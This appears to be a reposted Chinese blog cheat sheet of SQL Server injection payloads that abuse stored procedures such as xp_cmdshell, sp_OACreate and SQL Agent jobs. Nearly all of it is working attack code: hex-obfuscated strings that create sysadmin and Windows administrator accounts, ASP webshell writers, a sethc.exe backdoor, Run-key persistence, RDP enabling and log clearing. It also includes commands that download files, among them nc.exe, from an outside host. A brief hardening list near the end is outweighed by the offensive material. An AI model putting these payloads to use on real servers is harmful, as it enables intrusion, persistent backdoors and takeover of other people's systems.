SQL高级注入使用之储存过程(zt)

最新推荐文章于 2025-06-14 12:00:00 发布
最新推荐文章于 2025-06-14 12:00:00 发布
阅读量313 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: sql 文章标签: SQL SQL Server XP C C++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iteye_6173/article/details/82068561

SQL高级注入使用之储存过程

脚本 2010-07-20 20:00:41 阅读226 评论0   字号:   订阅


                 =====================================
                 =====SQL高级注入使用之储存过程 ======
                 =====================================


零、转载注来自:http://itpro.blog.163.com
本人前几年整理的,后来一朋友要传给他了,我也贴出来供大家研究使用。
---------------
-- 添加SA用户--
---------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、exec master.dbo.sp_addlogin itpro;
2、exec master.dbo.sp_addsrvrolemember itpro,sysadmin

&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
防注入 sa:itpro pass:itpro
declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726f as varchar(4000));exec(@s); declare @c varchar(4000) set @c=cast(0x65786563206d61737465722e64626f2e73705f70617373776f7264206e756c6c2c697470726f2c697470726f as varchar(4000));exec(@c); declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d6265722027697470726f272c2073797361646d696e as varchar(4000));exec(@a);-- and 1=1

一、

--------------
-恢复存储过程-
--------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
恢复cmdshell防注入
============================================================
declare @a varchar(255),@b varchar(255),@c varchar(255);
set @a=0x6D61737465722E2E73705F616464657874656E64656470726F63;
set @b=0x78705F636D647368656C6C;
set @c=0x78706C6F6737302E646C6C;
exec @a @b,@c
============================================================
恢复所有过程====
================
declare @s varchar(4000) set @s=cast(0x657865632073705F616464657874656E64656470726F63202778705F636D647368656C6C272C27787077656237302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F646972747265652C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F656E756D67726F7570732C2778706C6F6737302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F66697865646472697665732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F6C6F67696E636F6E6669672C2778706C6F6737302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F656E756D6572726F726C6F67732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F67657466696C6564657461696C732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F414372656174652C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4144657374726F792C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F414765744572726F72496E666F2C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4147657450726F70657274792C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F414D6574686F642C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4153657450726F70657274792C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632073705F4F4153746F702C276F64736F6C6537302E646C6C273B20657865632073705F616464657874656E64656470726F632078705F7265676164646D756C7469737472696E672C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656764656C6574656B65792C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656764656C65746576616C75652C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F726567656E756D76616C7565732C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F726567726561642C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656772656D6F76656D756C7469737472696E672C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F72656777726974652C277870737461722E646C6C273B20657865632073705F616464657874656E64656470726F632078705F617661696C61626C656D656469612C277870737461722E646C6C27 as varchar(4000));exec(@s);
============================================================
二、

----------------------------------
--恢复sp_addextendedproc存储过程--
----------------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

三、
--------------------------
--使用存储过程加管理方法--
--------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、master.dbo.xp_cmdshell 'net user itpro gmasfm && net localgroup administrators itpro /add'

2、 EXEC sp_resolve_logins 'text', 'e:\asp\"&net user admina admin /add&net localgroup administrators admina /add&dir "e:\asp', '1.asp'

3、DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user sadfish fish /add'

4、/**exec master.dbo.xp_servicecontrol start,SQLSERVERAGENT **/
exec msdb..sp_delete_job null,'lz' exec msdb..sp_add_job 'lz' exec msdb..sp_add_jobstep null,'lz',null,'1','cmdexec','cmd /c net user itpro gmasfm /add' exec msdb..sp_add_jobserver null,'lz',@@servername exec msdb..sp_start_job 'lz'

5、exec master.dbo.xp_servicecontrol start,SQLSERVERAGENT exec msdb..sp_delete_job null,'foofoofoo' exec msdb..sp_add_job 'foofoofoo' exec msdb..sp_add_jobstep null,'foofoofoo',null,'1','cmdexec','cmd /c dir c:\' exec msdb..sp_add_jobserver null,'foofoofoo',@@servername exec msdb..sp_start_job 'foofoofoo'

6、declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","SQLDebugge")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123abc~~~"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/SQLDebugge",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/SQLDebugge"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set fso = CreateObject("Scripting.FileSystemObject")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'f = fso.DeleteFile(WScript.ScriptName)'

7、 exec master.dbo.xp_servicecontrol start,SQLSERVERAGENT exec msdb..sp_delete_job null,'foofoofoo' exec msdb..sp_add_job 'foofoofoo' exec msdb..sp_add_jobstep null,'foofoofoo',null,'1','cmdexec','cmd /c dir c:\' exec msdb..sp_add_jobserver null,'foofoofoo',@@servername exec msdb..sp_start_job 'foofoofoo'
8、DECLARE @shell INT EXEC SP_OAcreate 'Shell.Application',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user sadfish fish /add'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

四、
-------------------------
-- 导出文件的存储过程  --
-------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINdows\system32\cmd.exe /c netstat -an >c:\1.txt'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

五、
---------------------------
--  读取文件的存储过程   --
---------------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\1.txt', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

六、

----------------------
-----写一句话木马-----
----------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

1\
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\Inetpub\tianhong\2.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'<%execute(request("a"))%>'     ' ' 单引号为要写的内容
<%25 if request("x")<>"" then execute(request("x"))%25>

2\
DECLARE @fs int,@fi int
EXEC SP_OACREATE 'Scripting.FileSystemObject',@fs OUTPUT
EXEC SP_OAMETHOD @fs,'CreateTextFile',@fs OUTPUT,'C:\InetPub\WWWRoot\Shell.asp',1
EXEC SP_OAMETHOD @fs,'WriteLine',null,'<%execute(request("a"))%>'
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

防注入写入法
================================================================
declare @a int,@b int,@c varchar(255),@d varchar(255),@e varchar(255),@f varchar(255),@g varchar(255),@h varchar(255),@i varchar(255),@j varchar(255);
set @c=0x6D61737465722E2E73705F6F61637265617465;
set @d=0x6D61737465722E2E73705F6F616D6574686F64;
set @e=0x536372697074696E672E46696C6573797374656D4F626A656374;
set @f=0x4372656174655465787446696C65;
set @g=0x433A5C496E65747075625C73797374656D2E617370;
set @h=0x74727565;
set @i=0x7772697465;
set @j=0x3C256576616C20726571756573742822582229253E;
exec @c @e,@a output;
exec @d @a,@f,@b output,@g,@h;
exec @d @b,@i,null,@j
==================================================================

七、
----------------------
-----写一句话木马-----
----------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
declare @s nvarchar(4000);select @s=0x730065006c00650063007400200027003c00250045007800650063007500740065002800720065007100750065007300740028002200610022002900290025003e000d000a002700;exec sp_makewebtask 0x43003a005c007a00770065006c006c002e00610073007000, @s;-- and% 1=1
在上面一样;exec%20sp_makewebtask%20'd:\zjkdj\zjkdj\zjkds\bake.asp,'%20select%20''<%25execute(request("a"))%25>''%20';--
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

八、
----------------------
---SA沙盒模式提权-----
----------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
1、 exec master.dbo.xp_regwrite 0x484b45595f4c4f43414c5f4d414348494e45,0x536f6674576172655c4d6963726f736f66745c4a65745c342e305c456e67696e6573,0x53616e64426f784d6f6465,0x5245475f44574f5244,0-- and 1=1
2、Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user itpro gmasfm /add")');
3、Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0', ';Database=ias\ias.mdb', 'select shell("cmd.exe /c dir c:\ >c:\2.txt")')
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

九、
--------------------
-----另类SA提权-----
--------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2、declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
1、declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

3. DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINdows\system32\cmd.exe /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe'
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

十、
--------------
--导出注册表--
--------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1、drop table [regdir];create table [regdir](value nvarchar(1000) null,data nvarchar(1000) null)--

2、delete [regdir];insert [regdir]exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port'

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

十一、

----------------
---下载程序-----
----------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1、 declare @b varbinary(8000),@hr int,@http int,@down int exec sp_oacreate [microsoft.xmlhttp],@http output exec @hr = sp_oamethod @http,[open],null,[get],[http://www.918x.cn/lz/xm.rar],0 exec @hr = sp_oamethod @http,[send],null exec @hr=sp_oagetproperty @http,[responsebody],@b output exec @hr=sp_oacreate [adodb.stream],@down output exec @hr=sp_oasetproperty @down,[type],1 exec @hr=sp_oasetproperty @down,[mode],3 exec @hr=sp_oamethod @down,[open],null exec @hr=sp_oamethod @down,[write],null,@b exec @hr=sp_oamethod @down,[savetofile],null,[c:/a.asp],1 ;-- and 1=1

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

十二、

-----------------
-Log备份WebShell-
-----------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
alter database master set RECOVERY FULL
create table cmd (a image)--
backup log master to disk = 'c:\cmd' with init
insert into cmd (a) values ('<%eval(request("a")):response.end%>')--
backup log master to disk = 'C:\Inetpub\wwwroot\ri3.asp'--
drop table cmd--
2\

use mir
alter database mir set RECOVERY FULL --
create table cmd8 (a image)--
backup log mir to disk = 'c:\cmd8' with init --
insert into cmd8 (a) values ('<%eval(request("a")):response.end%>')--
backup log mir to disk = 'c:\backup.asp'--
drop table cmd8--
alter database mir set RECOVERY SIMPLE --
3\
create/**/table/**/[dbo].[shit_tmp]/**/([cmd]/**/[image])--
declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name(),@s=0x6C0061006F007A0068006F007500/**/backup/**/log/**/@a/**/to/**/disk/**/=/**/@s/**/with/**/init,no_truncate--
insert/**/into/**/[shit_tmp](cmd)/**/values(0x3C256576616C28726571756573742822612229293A726573706F6E73652E656E64253E)--
select/**/@s=0x63003a005c0031002e00610073007000/**/backup/**/log/**/@a/**/to/**/disk=@s/**/with/**/init,no_truncate--
Drop/**/table/**/[shit_tmp]--



BACKUP DATABASE [zdlchina] TO  DISK = N'D:\webhost\zdlchina\UpFiles\Images\12\2002\4\15\2.rar'
all back datebase
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

十三、
-------------------------------
--创建sp_readtextfile存储过程--
-------------------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Create proc sp_readTextFile @filename sysname
as

  begin
  set nocount on
  Create table #tempfile (line varchar(8000))
  exec ('bulk insert #tempfile from "' + @filename + '"')
  select * from #tempfile
  drop table #tempfile
End
go

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

十四、开3389
===================================================================
1\
declare @a int,@b varchar(255),@c varchar(255),@d varchar(255),@e varchar(255),@f varchar(255),@g varchar(255);set @b=0x6D61737465722E2E73705F6F61637265617465;set @c=0x777363726970742E7368656C6C;set @d=0x6D61737465722E2E73705F6F616D6574686F64;set @e=0x72756E;set @f=0x636D64202F6320776D6963205244544F47474C45205748455245205365727665724E616D653D2725434F4D50555445524E414D4525272063616C6C20536574416C6C6F775453436F6E6E656374696F6E732031;set @g=0x74727565;EXEC @b @c,@a output;EXEC @d @a,@e,null,@f,0,@g
2\
declare @a varchar(255),@b varchar(255); set @a=0x6D61737465722E64626F2E78705F636D647368656C6C; set @b=0x636D64202F6320776D6963205244544F47474C45205748455245205365727665724E616D653D2725434F4D50555445524E414D4525272063616C6C20536574416C6C6F775453436F6E6E656374696F6E732031; exec @a @b
===================================================================
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
declare @s varchar(4000) set @s=cast(0x65786563206D61737465722E2E78705F726567726561642027484B45595F4C4F43414C5F4D414348494E45272C2753595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D546370272C27506F72744E756D62657227 as varchar(4000));exec(@s); --
declare/**/@s/**/varchar(4000)/**/set/**/@s=cast(0x65786563206D61737465722E2E78705F726567726561642027484B45595F4C4F43414C5F4D414348494E45272C2753595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D546370272C27506F72744E756D62657227/**/as/**/varchar(4000))/**/exec(@s)/**/--
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run','user','REG_SZ','net user itpro itpro /add'

十五、导入v.vbs到c盘。执行下载nc.exe
===================================================================
declare @s varchar(4000) set @s=cast(0x4445434C41524520407368656C6C20494E5420455845432053505F4F416372656174652027777363726970742E7368656C6C272C407368656C6C204F555450555420455845432053505F4F414D4554484F4420407368656C6C2C2772756E272C6E756C6C2C2027433A5C57494E646F77735C73797374656D33325C636D642E657865202F63206563686F205365742078506F7374203D204372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293A2078506F73742E4F70656E2022474554222C22687474703A2F2F7777772E393138782E636E2F6C7A2F6E632E657865222C30203A2078506F73742E53656E642829203A205365742073476574203D4372656174654F626A656374282241444F44422E53747265616D2229203A20734765742E4D6F6465203D2033203A20734765742E54797065203D31203A20734765742E4F70656E282920203A20734765742E57726974652878506F73742E726573706F6E7365426F647929203A20734765742E53617665546F46696C6520226E632E657865222C32203E633A5C762E76627327 as varchar(4000)) exec(@s) --
===================================================================

======================================================================================
十六,通过add_jobshell执行命令
=====================================================================================
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
go
EXECUTE msdb.dbo.sp_sqlagent_get_perf_counters
go
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset'))
go
EXECUTE msdb.dbo.sp_sqlagent_refresh_job @job_id = 0x2760BE4692FE9647AB48B1D59E5B27A4
go
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
go
SET TEXTSIZE 64512
go
select @@microsoftversion
go
select convert(sysname, serverproperty(N'servername'))
go
SELECT ISNULL(SUSER_SNAME(), SUSER_NAME())
go
EXECUTE msdb.dbo.sp_help_jobschedule @job_id = 0x2760BE4692FE9647AB48B1D59E5B27A4, @include_description = 0
go
use msdb exec sp_delete_job null,'x' exec sp_add_job 'x' exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user 1 /add' exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x'--;
go
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c where c.id = convert(tinyint, databasepropertyex ( db_name() , 'sqlcharset')) set quoted_identifier off
=======================================================================


我记得2003的web目录是写在C:\WINDOWS\system32\inetsrv\MetaBase.xml
-----------------
---读取文件内容--
-----------------
exec sp_readTextFile 'c:\windows\system32\boot.dat'


xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File  Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'

--------------------------------
------写注册表提权---------------
---------------------------------
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'

cmd.exe /c echo EXEC sp_addsrvrolemember test1, sysadmin >c:\test.qry
cmd.exe /c isql -E /U alma /P /i c:\test.qry

---清除MsSql日志-------
-----------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

----------------------
--停掉或激活某个服务--
----------------------
exec master..xp_servicecontrol 'stop','sharedaccess'
exec master..xp_servicecontrol 'start','sharedaccess'

清除日志  DUMP TRANSACTION [ITAssist] WITH NO_LOG

压缩文件

EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'c:\boot.ini'

--------------------
--列出驱动器的名称--
--------------------

EXEC [master].[dbo].[xp_availablemedia]

----------------------------------
--列出指定目录的所有下一级子目录--
----------------------------------

EXEC [master].[dbo].[xp_subdirs] 'c:\windows'

------------------------------
--列出当前错误日志的具体内容--
------------------------------

EXEC [master].[dbo].[xp_readerrorlog]

----------------------------------
-----获取当前文件的属性-----------
----------------------------------

xp_getfiledetails 'C:\Inetpub\wwwroot\shell.asp'
----------------------
--列出当前计算机名称--
----------------------

execute master..xp_getnetname

--------------------------------
-列出当前计算机的驱动器可用空间-
--------------------------------

execute master..xp_fixeddrives

========================
==列出服务器所有本地组==
========================

execute master..xp_enumgroups

======================
==获取MS SQL的版本号==
======================

execute master..sp_msgetversion
 
=========================================
==参数说明:目录名,目录深度,是否显示文件==
=========================================

execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1

=========================================
==列出服务器上安装的所有OLEDB提供的程序==
=========================================

execute master..xp_enum_oledb_providers

=========================
==列出服务器上配置的DNS==
=========================

execute master..xp_enumdsn

删除存储过程

drop PROCEDURE sp_addextendedproc

xp_logininfo
报告帐户、帐户类型、帐户的特权级别、帐户的映射登录名和帐户访问 Microsoft? SQL Server? 的权限路径。

EXEC xp_logininfo

EXEC xp_msver
执行权限默认授予 public 角色。
返回并允许要查询的 Microsoft? SQL Server? 版本信息。除了有关服务器实际内部版本号码的版本信息外,还返回多种环境信息。该信息可以在 Transact-SQL 语句、批处理、存储过程等环境中使用,以增强与平台无关代码的逻辑。


EXEC xp_msver
-----------------------
--删除sql危险存储过程--
-----------------------

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
DROP PROCEDURE sp_makewebtask
exec master..sp_dropextendedproc xp_cmdshell
exec master..sp_dropextendedproc xp_dirtree
exec master..sp_dropextendedproc xp_fileexist
exec master..sp_dropextendedproc xp_terminate_process
exec master..sp_dropextendedproc sp_oamethod
exec master..sp_dropextendedproc sp_oacreate
exec master..sp_dropextendedproc xp_regaddmultistring
exec master..sp_dropextendedproc xp_regdeletekey
exec master..sp_dropextendedproc xp_regdeletevalue
exec master..sp_dropextendedproc xp_regenumkeys
exec master..sp_dropextendedproc xp_regenumvalues
exec master..sp_dropextendedproc sp_add_job
exec master..sp_dropextendedproc sp_addtask
exec master..sp_dropextendedproc xp_regread
exec master..sp_dropextendedproc xp_regwrite
exec master..sp_dropextendedproc xp_readwebtask
exec master..sp_dropextendedproc xp_makewebtask
exec master..sp_dropextendedproc xp_regremovemultistring
exec master..sp_dropextendedproc sp_OACreate
DROP PROCEDURE sp_addextendedproc
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xp_cmdshell新的恢复办法

扩展储存过程被删除以后可以有很简单的办法恢复:
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复,不用去管sp_addextendedproc是不是存在

-----------------------------

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'


开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
返回结果为1就ok

否则上传xplog7.0.dll
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell
搜索型注入
' and 1=host_name()--
' and 1=@@version--
' and 1=db_name()--
' and 1=user--
' and 1=@@servername--
%'and @@version>0 and '%'='      {得到数据库版本
%'and user>0 and '%'='           {得到帐号
%'and db_name()>0 and '%'='      {得到当前数据库
%'and @@servername>0 and '%'='   {得到服务器名称
%'and system_user>0 and '%'='    {得到系统用户
%'and (select count(*) from administrator)>0 and '%'='   {返回错误页面,看来是没有admin这个表了
%'and (select username from admin)>0 and '%'='
%'and (select password from admin)>0 and '%'='
%'and (select id from admin where ID=1)>0 and '%'='

%'declare @s varchar(4000) set @s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726f as varchar(4000));exec(@s); declare @c varchar(4000) set @c=cast(0x65786563206d61737465722e64626f2e73705f70617373776f7264206e756c6c2c697470726f2c697470726f as varchar(4000));exec(@c); declare @a varchar(4000) set @a=cast(0x65786563206d61737465722e64626f2e73705f616464737276726f6c656d656d6265722027697470726f272c2073797361646d696e as varchar(4000));exec(@a);--and '%'=' 得到itpro itpro的SA权限
mysql存储过程 sql注入_pymysql如何解决sql注入问题深入讲解
weixin_39629780的博客
02-08 854
